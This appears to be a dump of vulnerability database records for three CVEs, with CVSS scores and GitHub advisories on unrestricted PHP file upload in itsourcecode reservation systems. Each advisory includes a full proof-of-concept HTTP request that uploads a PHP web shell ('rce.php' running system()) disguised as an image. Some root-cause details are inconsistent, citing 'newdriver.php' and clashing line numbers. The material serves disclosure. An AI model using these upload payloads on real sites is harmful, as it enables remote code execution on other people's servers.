{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268866" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268866" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358995" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358995" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:monbela_tourist_inn_online_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E689E6B3-30E9-405A-A3AB-A5597F84A664", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/wangyuan-ui/CVE/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wangyuan-ui", "CVE" ]
# Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Monbela Tourist In Online Reservation System Using PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/monbela-tourist-inn-online-reservation-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangyuan-ui ## Vulnerable File + controller.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/05/Monbela.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 45 of the controller.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/wangyuan-ui/CVE/assets/173124196/3eb0408a-c4f8-4aa0-a3f2-ee46e74de4fb) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + wangyuan-ui discovered that the file upload operation was triggered on line 164 of the 'controller.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ## ``` POST /admin/mod_room/controller.php?action=add HTTP/1.1 Host: localhost:8103 Content-Length: 2782 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8103 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrKFZ95dXQZ0NftNp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8103/admin/mod_room/index.php?view=add Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="ROOM" 11 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="ACCOMID" 12 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="ROOMDESC" 11 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="NUMPERSON" 11 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="PRICE" 11 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="ROOMNUM" 11 ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="image"; filename="rce.php" Content-Type: image/jpeg Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show <?php system("ipconfig"); ?> ------WebKitFormBoundaryrKFZ95dXQZ0NftNp Content-Disposition: form-data; name="save" ------WebKitFormBoundaryrKFZ95dXQZ0NftNp-- ``` + ![2](https://github.com/wangyuan-ui/CVE/assets/173124196/b8bf61b0-4cc8-421b-b402-3e493b69fddd) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/wangyuan-ui/CVE/assets/173124196/0ece3c00-a11a-4e10-8297-8dca14753ac2)
Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload
https://api.github.com/repos/wangyuan-ui/CVE/issues/4/comments
0
2024-06-18T04:46:56Z
2024-06-18T04:48:47Z
https://github.com/wangyuan-ui/CVE/issues/4
2,358,888,461
4
6,095
CVE-2024-6115
2024-06-18T13:15:53.267
A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268867" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268867" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358996" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268867" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268867" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358996" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clivedelacruz:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEE3B1B1-BA46-42EB-BF9A-B1A7D52EF741", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/wangyuan-ui/CVE/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wangyuan-ui", "CVE" ]
# Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 add_room.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Simple Online Hotel Reservation System in PHP Project With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/simple-hotel-online-reservation-system-php/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangyuan-ui ## Vulnerable File + add_room.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2018/12/SimpleOnline_HotelReservation.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 8 of the newdriver.php file, the input obtained through $_FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/wangyuan-ui/CVE/assets/173124196/ec046194-0475-4f6a-ad5a-c9de471c900c) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + wangyuan-ui discovered that the file upload operation was triggered on line 8 of the 'add_room.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ## ``` POST /admin/add_room.php HTTP/1.1 Host: localhost:8103 Content-Length: 2410 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8103 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1bZEIRhzjIw1vaXA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8103/admin/add_room.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundary1bZEIRhzjIw1vaXA Content-Disposition: form-data; name="room_type" Standard ------WebKitFormBoundary1bZEIRhzjIw1vaXA Content-Disposition: form-data; name="price" 11 ------WebKitFormBoundary1bZEIRhzjIw1vaXA Content-Disposition: form-data; name="photo"; filename="rce.php" Content-Type: image/jpeg Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show <?php system("ipconfig"); ?> ------WebKitFormBoundary1bZEIRhzjIw1vaXA Content-Disposition: form-data; name="add_room" ------WebKitFormBoundary1bZEIRhzjIw1vaXA-- ``` + ![2](https://github.com/wangyuan-ui/CVE/assets/173124196/a914330a-9f8b-44a4-98db-aff7f1191c7f) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/wangyuan-ui/CVE/assets/173124196/2396508d-8a19-453d-a552-f82b3faebbca)
Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 add_room.php Unrestricted Upload
https://api.github.com/repos/wangyuan-ui/CVE/issues/5/comments
0
2024-06-18T04:51:01Z
2024-06-18T04:51:01Z
https://github.com/wangyuan-ui/CVE/issues/5
2,358,892,810
5
6,096
CVE-2024-6116
2024-06-18T14:15:12.440
A vulnerability, which was classified as critical, has been found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this issue is some unknown functionality of the file edit_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268868.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268868" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268868" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.359002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.359002" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clivedelacruz:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEE3B1B1-BA46-42EB-BF9A-B1A7D52EF741", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/wangyuan-ui/CVE/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wangyuan-ui", "CVE" ]
# Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 edit_room.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Simple Online Hotel Reservation System in PHP Project With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/simple-hotel-online-reservation-system-php/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangyuan-ui ## Vulnerable File + edit_room.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2018/12/SimpleOnline_HotelReservation.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 9 of the newdriver.php file, the input obtained through $_FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/wangyuan-ui/CVE/assets/173124196/be93fb45-b34d-4b7f-bbc2-973770877206) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + wangyuan-ui discovered that the file upload operation was triggered on line 9 of the 'edit_room.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ## ``` POST /admin/edit_room.php?room_id=5 HTTP/1.1 Host: localhost:8103 Content-Length: 2413 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8103 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTYaxjScwwCSSNWA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8103/admin/edit_room.php?room_id=5 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryGTYaxjScwwCSSNWA Content-Disposition: form-data; name="room_type" Standard ------WebKitFormBoundaryGTYaxjScwwCSSNWA Content-Disposition: form-data; name="price" 3500 ------WebKitFormBoundaryGTYaxjScwwCSSNWA Content-Disposition: form-data; name="photo"; filename="rce.php" Content-Type: image/jpeg Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show <?php system("ipconfig"); ?> ------WebKitFormBoundaryGTYaxjScwwCSSNWA Content-Disposition: form-data; name="edit_room" ------WebKitFormBoundaryGTYaxjScwwCSSNWA-- ``` + ![2](https://github.com/wangyuan-ui/CVE/assets/173124196/b421e618-9d54-41fb-8b22-fa02f5dc1cbe) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/wangyuan-ui/CVE/assets/173124196/93d12977-157f-46ea-9461-fe4627115f49)
Itsourcecode Simple Online Hotel Reservation System in PHP Project With Source Code 1.0 edit_room.php Unrestricted Upload
https://api.github.com/repos/wangyuan-ui/CVE/issues/6/comments
0
2024-06-18T04:55:42Z
2024-06-18T04:55:42Z
https://github.com/wangyuan-ui/CVE/issues/6
2,358,897,857
6
6,097